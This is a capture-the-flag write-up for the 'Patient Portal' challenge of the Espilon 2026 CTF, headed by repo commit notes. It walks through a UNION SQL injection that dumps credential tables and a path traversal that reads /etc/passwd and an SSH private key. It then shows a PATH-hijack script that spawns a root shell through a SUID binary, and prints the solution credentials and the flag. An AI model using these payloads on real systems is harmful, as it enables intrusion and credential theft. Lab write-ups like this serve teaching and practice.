- Remove undeployed challenges: Phantom_Byte, Cr4cK_w1f1, Lain_Br34kC0r3 V1, Lain_VS_Knights, Lets_All_Love_UART, AETHER_NET, Last_Train_451, Web3/
- Sync 24 solve/ files from main CTF-Espilon repo
- Update all READMEs with real CTFd final scores at freeze
- Add git-header.png banner
- Rewrite README: scoreboard top 10, edition stats (1410 users, 264 boards, 1344 solves), correct freeze date March 26 2026
Patient Portal
| Field | Value |
|---|---|
| Category | Misc |
| Difficulty | Medium-Hard |
| Points | 340 |
| Author | Eun0us |
| CTF | Espilon 2026 |
Description
The WIRED-MED network at Clinique Sainte-Mika runs a patient portal for staff. Intelligence suggests the system was hastily deployed by contractor M. Eiri.
Gain full control of the machine.
Ports:
- 8080: Web Portal (HTTP)
- 2222: SSH
Format: ESPILON{flag}
TL;DR
SQL injection on the /search endpoint to dump credentials and the SSH passphrase. Log in
as admin, exploit path traversal on the report download endpoint to steal the SSH private key.
SSH in as webadmin. Find a SUID binary that calls logger with a relative path. Hijack it
via PATH injection to spawn a root shell and read the flag.
Tools
| Tool | Purpose |
|---|---|
| Browser / curl | SQL injection, admin login, path traversal |
| hashcat / CrackStation | MD5 crack for admin password |
| ssh | Login as webadmin |
| bash | PATH injection privilege escalation |
Solution
Stage 1 — SQL Injection
The /search?q= endpoint is vulnerable to UNION-based injection with 6 columns.
Enumerate columns:
/search?q=' UNION SELECT 1,2,3,4,5,6--
Discover tables:
/search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'--
Tables: patients, users, system_config
Dump users:
/search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users--
Results:
- admin: MD5 hash e0b7e413c064de43c6c1ca40a8c175a1
- nurse01: (irrelevant)
Dump system_config:
/search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config--
Key finding: ssh_passphrase = wired-med-013
Crack the admin password:
```bash
echo -n "SainteMika2026" | md5sum
# e0b7e413c064de43c6c1ca40a8c175a1
```
Password: SainteMika2026
Stage 2 — Admin Access
Log in at /login:
- Username: admin
- Password: SainteMika2026
The admin panel reveals: SSH port 2222, user webadmin.
Stage 3 — Path Traversal
The /admin/reports?file= endpoint is vulnerable to path traversal.
Confirm user exists:
/admin/reports?file=../../../etc/passwd
Extract the SSH private key:
/admin/reports?file=../../../home/webadmin/.ssh/id_rsa
Save the key to id_rsa locally.
Stage 4 — SSH Access
```bash
chmod 600 id_rsa
ssh -i id_rsa -p 2222 webadmin@<HOST>
# Passphrase: wired-med-013 (from system_config)
```
Stage 5 — Privilege Escalation
Find SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Found: /opt/navi-monitor/vital-check (SUID root)
Inspect the binary:
strings /opt/navi-monitor/vital-check | grep logger
The binary calls system("logger -t vital-check 'check complete'") using a
relative path for logger.
Exploit via PATH hijacking:
```bash
echo '#!/bin/bash' > /tmp/logger
echo '/bin/bash -p' >> /tmp/logger
chmod +x /tmp/logger
export PATH=/tmp:$PATH
/opt/navi-monitor/vital-check
```
bash -p preserves the SUID effective UID, spawning a root shell.
Read the flag:
cat /root/root.txt
Flag
ESPILON{r00t_0f_s41nt3_m1k4}




